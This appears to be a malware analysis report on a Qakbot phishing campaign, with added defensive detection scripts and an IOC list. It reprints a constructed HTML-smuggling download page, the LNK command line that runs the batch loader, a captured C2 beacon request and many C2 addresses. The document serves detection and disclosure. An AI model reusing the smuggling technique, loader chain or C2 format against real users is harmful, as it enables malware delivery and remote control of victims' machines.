Qakbot Malware Campaign Using Google Drive Phishing Lure For Spreading


Executive Summary 

  • Qakbot is a modular information stealer, also known as QBot or Pinkslipbot, that has been active since 2007. It is historically known as a banking Trojan, meaning that it steals financial data from infected systems, and as a loader that uses its C2 servers to select and download additional payloads.
  • According to our research, Qakbot has been delivered through HTML attachments with fake Adobe messages since at least July 2022. This week the operators introduced two new variants that mimic either a Google Drive page or a Dropbox page.
  • Qakbot is delivered via HTML smuggling: when the victim opens the HTML file attached to the phishing email, JavaScript embedded in the file writes out an encrypted ZIP archive that contains the Qakbot payload.
  • After delivery, Qakbot is executed by a single user click on a decoy shortcut (LNK) file named Cancellation. The shortcut is disguised as an ordinary folder as part of the social engineering; once clicked, it triggers execution of the Qakbot DLL via regsvr32.exe.

Technical Analysis 

HTML Smuggling With Google Drive Phishing Lure

During our research we observed multiple Qakbot samples that use a Google Drive phishing lure to trick victims. The lure is used during the delivery stage.

HTML smuggling in action: the page drops a ZIP archive that contains a malicious ISO image.
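The following is an added example, not code from the original article, showing how a defender can statically triage an HTML attachment for the smuggling traits described above (a large base64 literal that is decoded with atob, wrapped in a Blob and force-downloaded). SAMPLE_HTML is a constructed page that imitates the Google Drive lure; it is not the real Cancellation_3294.html sample, and the indicator list and scoring threshold are assumptions.

```python
"""Static triage of an HTML attachment for HTML-smuggling indicators.

Added example; not code from the original article. SAMPLE_HTML is constructed
to mimic the Google Drive lure described in the post and embeds a harmless
placeholder ZIP header, not the real payload.
"""
import base64
import binascii
import re

# Constructed "payload": a ZIP local-file header followed by filler bytes.
FAKE_ZIP = b"PK\x03\x04" + bytes(range(60))

# Constructed lure page: rebuilds the ZIP from a base64 literal and forces a
# download through a Blob URL, the pattern HTML smuggling relies on.
SAMPLE_HTML = """<html><head><title>Google Drive - Cancellation_3294.zip</title></head>
<body><p>Your file is being prepared for download...</p>
<script>
var d = "__PAYLOAD__";
var b = new Blob([Uint8Array.from(atob(d), c => c.charCodeAt(0))], {type: "application/zip"});
var a = document.createElement("a");
a.href = URL.createObjectURL(b);
a.download = "Cancellation_3294.zip";
a.click();
</script></body></html>""".replace("__PAYLOAD__", base64.b64encode(FAKE_ZIP).decode())

# JavaScript constructs typical of smuggling pages (author's assumption; tune as needed).
JS_INDICATORS = {
    "atob": r"\batob\s*\(",
    "blob": r"\bnew\s+Blob\s*\(",
    "object_url": r"URL\.createObjectURL\s*\(",
    "ms_save_blob": r"msSaveOrOpenBlob",
    "download_attr": r"\bdownload\s*=",
    "auto_click": r"\.click\s*\(\s*\)",
}
# Quoted base64 literals long enough to carry a file (40+ chars).
B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{40,}={0,2})"')
# File-type magic to recognise inside decoded literals.
MAGIC = {b"PK\x03\x04": "zip", b"MZ": "pe", b"%PDF": "pdf"}


def triage_html(html: str) -> dict:
    """Return the matched indicators, any decodable embedded payloads and a score."""
    hits = [name for name, pat in JS_INDICATORS.items() if re.search(pat, html)]
    payloads = []
    for m in B64_LITERAL.finditer(html):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64, ignore the literal
        kind = next((k for magic, k in MAGIC.items() if raw.startswith(magic)), "unknown")
        payloads.append({"size": len(raw), "type": kind})
    # A recognised embedded file weighs more than any single JS indicator.
    score = len(hits) + 2 * sum(p["type"] != "unknown" for p in payloads)
    return {"indicators": hits, "payloads": payloads, "score": score, "suspicious": score >= 4}


if __name__ == "__main__":
    print(triage_html(SAMPLE_HTML))
```

Run it on the raw attachment body before any rendering; because the ZIP in the real campaign is password protected, the decoded literal still starts with the PK magic, so the payload type is recognisable even though its contents are not inspectable.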

Decoy Shortcut (LNK) File Loading Qakbot Malware 

Opening the encrypted ZIP archive reveals an ISO file that contains Qakbot. The decoy shortcut (LNK) file and the Qakbot DLL are stored inside the same ISO image. ISO files are opened and mounted as a drive by a single user click.

ISO Image inside Encrypted ZIP folder

If the victim opens the ISO image, it is mounted as a drive and a new File Explorer window opens automatically, as shown below:

The decoy shortcut (LNK) file inside the ISO image triggers execution of the Qakbot DLL.

Execution of the Qakbot DLL is triggered by a user click on the decoy shortcut (LNK) file. As the image above shows, the Target field of the LNK file carries the command line that cmd.exe executes.

Full command line in the Target field:

C:\Windows\System32\cmd.exe /c inexhaustive\downloading.cmd regs v

cmd.exe runs a batch file named downloading.cmd. Reading the script inside the inexhaustive folder shows that downloading.cmd is used to execute the Qakbot DLL via regsvr32.exe.

subscriptions.dat is the Qakbot DLL :

downloading.cmd batch file.
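As an added example (not code from the original article), the rule below evaluates process-creation events for the chain described in this section: explorer.exe launching cmd.exe with the shortcut's command line, which in turn starts regsvr32.exe against a file that is not a COM DLL. The event records are constructed to resemble Sysmon or EDR logs; the process ids, the mounted drive letter E: and the benign msiexec control case are assumptions.

```python
"""Process-tree rule for the LNK -> cmd.exe -> batch -> regsvr32.exe chain.

Added example; not code from the original article. EVENTS is constructed:
pids, the E: drive letter and the benign control are assumptions, the cmd.exe
command line is the one shown in the post.
"""
import ntpath

EVENTS = [
    {"pid": 100, "ppid": 1, "image": "C:\\Windows\\explorer.exe",
     "cmd": "explorer.exe"},
    {"pid": 101, "ppid": 100, "image": "C:\\Windows\\System32\\cmd.exe",
     "cmd": "C:\\Windows\\System32\\cmd.exe /c inexhaustive\\downloading.cmd regs v"},
    {"pid": 102, "ppid": 101, "image": "C:\\Windows\\System32\\regsvr32.exe",
     "cmd": "regsvr32.exe E:\\inexhaustive\\subscriptions.dat"},
    # Benign control: an installer registering a COM DLL (constructed).
    {"pid": 200, "ppid": 1, "image": "C:\\Windows\\System32\\msiexec.exe",
     "cmd": "msiexec.exe /i setup.msi"},
    {"pid": 201, "ppid": 200, "image": "C:\\Windows\\System32\\regsvr32.exe",
     "cmd": "regsvr32.exe /s C:\\Vendor\\vendor.dll"},
]

COM_EXTS = {".dll", ".ocx", ".ax"}  # extensions regsvr32 legitimately registers


def _base(image):
    return ntpath.basename(image).lower()


def _module_arg(cmd):
    """Last non-switch token of a regsvr32 command line (paths assumed unquoted, no spaces)."""
    toks = [t for t in cmd.split() if not t.startswith("/")]
    return toks[-1] if len(toks) > 1 else ""


def ancestors(pid, by_pid):
    """Image names from pid upward until the parent is unknown."""
    chain = []
    while pid in by_pid:
        ev = by_pid[pid]
        chain.append(_base(ev["image"]))
        pid = ev["ppid"]
    return chain


def evaluate(events):
    """Return one alert per regsvr32.exe process that matches any rule."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if _base(e["image"]) != "regsvr32.exe":
            continue
        mod = _module_arg(e["cmd"])
        ext = ntpath.splitext(mod)[1].lower()
        reasons = []
        if ext not in COM_EXTS:
            reasons.append(f"module extension {ext or '(none)'} is not a COM DLL")
        if ancestors(e["ppid"], by_pid)[:2] == ["cmd.exe", "explorer.exe"]:
            reasons.append("spawned by cmd.exe launched from explorer.exe (shortcut chain)")
        parent = by_pid.get(e["ppid"])
        if parent and " /c " in parent["cmd"].lower() and ".cmd" in parent["cmd"].lower():
            reasons.append("parent cmd.exe executed a batch file")
        if reasons:
            alerts.append({"pid": e["pid"], "module": mod, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in evaluate(EVENTS):
        print(alert)
```

The extension check is the cheapest signal here: a .dat file passed to regsvr32.exe has no legitimate reason to exist, and it holds even when the batch file name, folder name and drive letter change between campaigns.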

Process Injection into wermgr.exe

After the Qakbot DLL executes, it performs process injection to evade anti-malware detection.

Qakbot runs from an injected process named wermgr.exe. After a short sleep (2 seconds, to evade memory scanning) it connects to multiple command and control servers, which gives the operators remote access to the victim device.

Disassembled Qakbot Malware 

Analysis of Unpacked Qakbot Malware 

The picture below shows the injected DLL in the wermgr.exe process:

We can extract this section from memory and continue the analysis on the unpacked Qakbot binary.

Qakbot checks whether it is running in the Windows Defender sandbox by testing for the existence of a specific subdirectory, C:\INTERNAL\__empty. If this folder exists, the malware terminates itself:

Debugging the Qakbot Malware.

Qakbot creates a persistence subdirectory with a randomly generated name under %APPDATA%\Microsoft. The in-memory Qakbot binary is dropped into this folder so that it persists across reboots.

The malware then enumerates running processes to detect antivirus (AV) products on the machine. The image below lists the AV vendors QBot reacts to:

If Qakbot finds one of these processes, it either terminates itself immediately or performs evasive actions, depending on which AV vendor was detected.
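The following added example (not code from the original article) is a hunting script for the persistence location described above: it walks %APPDATA%\Microsoft, skips folders that Microsoft products are expected to create, and reports any other folder that holds an executable payload, noting whether its name looks randomly generated. The folder allowlist, the randomness heuristic and the sample tree built by build_sample_tree() (including the folder name kwrtzqvhd) are assumptions; only the file name subscriptions.dat is taken from the post.

```python
"""Hunt for a randomly named persistence folder under %APPDATA%\\Microsoft.

Added example; not code from the original article. The directory layout is
constructed in a temporary folder; the allowlist and the randomness heuristic
are the author's assumptions.
"""
import tempfile
from pathlib import Path

# Folder names Microsoft products commonly create under %APPDATA%\Microsoft
# (assumption; extend it for your environment).
KNOWN_DIRS = {"windows", "office", "teams", "internet explorer", "protect",
              "credentials", "crypto", "systemcertificates", "vault", "spelling",
              "input method", "edge", "onedrive", "outlook"}
PAYLOAD_EXTS = {".dll", ".exe", ".dat"}  # .dat: the Qakbot DLL was dropped as subscriptions.dat


def looks_random(name: str) -> bool:
    """Heuristic: a single run of 5+ lowercase letters with few vowels (assumption)."""
    if not name.isalpha() or not name.islower() or len(name) < 5:
        return False
    vowels = sum(c in "aeiou" for c in name)
    return vowels / len(name) < 0.35


def hunt(appdata) -> list:
    """Return unexpected folders under <appdata>/Microsoft that contain a payload file."""
    base = Path(appdata) / "Microsoft"
    findings = []
    if not base.is_dir():
        return findings
    for d in base.iterdir():
        if not d.is_dir() or d.name.lower() in KNOWN_DIRS:
            continue
        payloads = sorted(p.name for p in d.iterdir()
                          if p.is_file() and p.suffix.lower() in PAYLOAD_EXTS)
        if payloads:
            findings.append({"dir": str(d), "random_name": looks_random(d.name),
                             "files": payloads})
    return findings


def build_sample_tree(root) -> Path:
    """Constructed test layout: two expected folders, one vendor folder, one drop folder."""
    appdata = Path(root) / "AppData" / "Roaming"
    (appdata / "Microsoft" / "Windows").mkdir(parents=True)
    (appdata / "Microsoft" / "Office").mkdir()
    (appdata / "Microsoft" / "Office" / "recent.txt").write_text("benign")
    (appdata / "Microsoft" / "Vendor").mkdir()
    (appdata / "Microsoft" / "Vendor" / "settings.ini").write_text("benign")
    drop = appdata / "Microsoft" / "kwrtzqvhd"          # assumed random name
    drop.mkdir()
    (drop / "subscriptions.dat").write_bytes(b"MZ" + b"\0" * 30)  # placeholder bytes, not malware
    return appdata


def demo() -> list:
    """Build the constructed tree in a temp dir and run the hunt over it."""
    with tempfile.TemporaryDirectory() as td:
        return hunt(build_sample_tree(td))


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

On a live host, call hunt() with the real %APPDATA% path of each user profile; a finding with random_name set and a single .dll or .dat inside is a strong candidate for the folder this section describes, and the Run key that references it (T1547.001 in the ATT&CK table) can then be checked separately.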

Extracted Process Name Checklist (AV Vendors) on Qakbot Malware.

Command and Control Communication 

Through the C2 connection the operators behind Qakbot control the malware remotely and deploy additional malicious modules. Qakbot stores its configuration and its command and control server list in the Windows Registry of the infected system in RC4-encrypted form.

Below is an example of a POST request sent by Qakbot to its C2 server:

POST /t5 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Host: 191.33.187.218:2222
Content-Length: 75
Cache-Control: no-cache

syuslt=JIzsvIkCCQ/mKd8qy8BISSmso7MwenJbTl/Sj6iFRcg+fxy/XXaloVGOjnQofoiNiQ==
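As an added example (not code from the original article), the script below parses the captured request above, checks it against a subset of the C2 list from the IOC section, and scores the traffic shape that remains when the exact IP is not on the list: a beacon on an uncommon port, the Trident/7.0 User-Agent with a Flash Accept header, and a body that is one short random-named form field carrying opaque base64. RAW_REQUEST is the request shown above with its line breaks restored; the port set, the scoring weights and the threshold are assumptions drawn from this one sample.

```python
"""Parse a Qakbot-style C2 POST and check it against the C2 IOC list.

Added example; not code from the original article. RAW_REQUEST is the request
shown in the post; C2_LIST is a subset of the post's IOC list; the heuristics
are the author's assumptions.
"""
import base64
import binascii
import re

RAW_REQUEST = (
    "POST /t5 HTTP/1.1\r\n"
    "Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko\r\n"
    "Host: 191.33.187.218:2222\r\n"
    "Content-Length: 75\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
    "syuslt=JIzsvIkCCQ/mKd8qy8BISSmso7MwenJbTl/Sj6iFRcg+fxy/XXaloVGOjnQofoiNiQ=="
)

# Subset of the C2 servers from the IOC section (ip:port).
C2_LIST = {"191.33.187.192:2222", "190.75.151.66:2222",
           "201.223.169.238:32100", "97.92.4.205:8443"}
# Ports that appear in the IOC list; 443 is excluded from the heuristic as too common.
BEACON_PORTS = {995, 993, 2222, 2087, 8443, 32100}


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into request line, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def analyse(raw: str, c2_list=C2_LIST) -> dict:
    """Return IOC match, body facts and a heuristic score for one captured request."""
    req = parse_request(raw)
    h = req["headers"]
    hostport = h.get("host", "")
    host, port = hostport.rsplit(":", 1) if ":" in hostport else (hostport, "80")
    port = int(port) if port.isdigit() else 80

    key, _, value = req["body"].partition("=")
    try:
        decoded = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        decoded = b""

    f = {
        "host": host, "port": port, "form_key": key, "decoded_len": len(decoded),
        "ioc_match": f"{host}:{port}" in c2_list,
        "content_length_ok": int(h.get("content-length", -1)) == len(req["body"].encode()),
        "beacon_port": port in BEACON_PORTS,
        "ie11_ua": "Trident/7.0" in h.get("user-agent", ""),
        "flash_accept": "x-shockwave-flash" in h.get("accept", ""),
        # single short lowercase field name, no other fields, value is valid base64
        "opaque_body": bool(decoded) and "&" not in req["body"]
                       and re.fullmatch(r"[a-z]{4,10}", key) is not None,
    }
    f["score"] = (3 * f["ioc_match"] + f["beacon_port"] + f["ie11_ua"]
                  + f["flash_accept"] + f["opaque_body"])
    f["suspicious"] = f["score"] >= 3
    return f


if __name__ == "__main__":
    print(analyse(RAW_REQUEST))
```

Note that the Host in the captured request (191.33.187.218) is not itself in the C2 list, so an exact IOC lookup alone misses it; the shape-based checks are what flag the session, which is why both should run side by side in a proxy or IDS rule.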

Indicators of Compromise (IOC)

Command and Control Servers

197.204.53.242:443
105.106.60.149:443
102.159.110.79:995
64.207.237.118:443
156.216.134.70:995
180.151.116.67:443
190.199.97.108:993
206.1.203.0:443
186.188.96.197:443
206.1.128.203:443
201.249.100.208:995
190.75.151.66:2222
198.2.51.242:993
90.165.109.4:2222
71.199.168.185:443
181.56.171.3:995
43.241.159.148:443
41.103.1.16:443
24.207.97.117:443
105.157.86.118:443
201.223.169.238:32100
47.14.229.4:443
70.60.142.214:2222
41.47.249.185:443
142.181.183.42:2222
41.62.165.152:443
41.97.205.96:443
41.97.14.60:443
151.213.183.141:995
75.84.234.68:443
186.18.210.16:443
41.96.204.196:443
64.123.103.123:443
186.48.174.77:995
152.170.17.136:443
160.176.151.70:995
78.179.135.247:443
191.33.187.192:2222
41.140.63.187:443
98.207.190.55:443
196.65.217.253:995
78.50.124.220:443
91.171.72.214:32100
186.154.189.162:995
101.109.44.197:995
97.92.4.205:8443
41.36.159.36:993
70.115.104.126:443
181.44.34.172:443
88.240.75.201:443
113.162.196.232:443
156.197.230.148:995
24.130.228.100:443
41.109.228.108:995
24.177.111.153:443
60.54.65.27:443
189.129.38.158:2222
190.203.51.133:2222
96.46.230.10:443
222.117.141.133:443
190.207.137.189:2222
208.78.220.120:443
105.108.133.151:443
41.104.155.245:443
65.140.11.170:443
184.159.76.47:443
105.98.223.169:443
190.201.145.155:443
197.0.225.39:443
41.101.193.38:443
105.155.151.29:995
196.207.146.151:443
190.37.112.223:2222
14.54.83.15:443
93.156.96.171:443
58.186.75.42:443
189.110.3.60:2222
186.18.77.99:443
41.107.78.169:443
149.126.159.224:443
156.196.169.222:443
190.100.149.122:995
1.0.215.176:443
202.5.53.143:443
206.1.199.156:2087
102.156.162.83:443
220.134.54.185:2222
88.132.109.147:443
190.29.228.61:443
41.101.183.90:443
94.36.5.31:443
102.184.30.42:443
102.187.63.127:995
190.33.87.140:443
187.198.16.39:443
62.46.231.64:443
42.116.54.220:443
197.244.142.102:443
190.203.106.109:2222
200.155.61.245:995

File Name                SHA-256 Hash
subscriptions.dat        e60d2c82e95df823c9dc20214260054af00b56e5ad7a0e43c391f6b896556040
downloading.cmd          03b8d788005825c4673fce9d0bfa9062d98b0f45ed2a58e9e84e56b3c298da67
Cancellation.lnk         3e5bf080807bb38ceab0c79fb78301fdd7c2ddeea48747782d11af25ed3f015b
Cancellation#2665.iso    624d3aff0e8590f0c0621583b81c88401121e12865dfb1a216f46cb68090ac5e
Cancellation_3294.html   ff185240002d2d01d6a15c323ae6d96b8380e813a68f2fb387e52aadd96a1158
Unpacked_Qakbot.dll      4405116c97462f3f6e050ec377c9a07899294177b0ad4e34e5da54ceb3c140c6

MITRE ATT&CK TTPs

Tactic                 Technique
Initial Access         T1566.001 – Phishing: Spear Phishing Attachment
Initial Access         T1566.002 – Phishing: Spear Phishing Link
Execution              T1027 – Obfuscated Files or Information
Execution              T1204.002 – User Execution: Malicious File
Persistence            T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Defense Evasion        T1055 – Process Injection
Defense Evasion        T1027.002 – Obfuscated Files or Information: Software Packing
Defense Evasion        T1497.001 – Virtualization/Sandbox Evasion: System Checks
Command and Control    T1071.001 – Application Layer Protocol: Web Protocols
Defense Evasion        T1055.012 – Process Injection: Process Hollowing
Defense Evasion        T1027.006 – Obfuscated Files or Information: HTML Smuggling
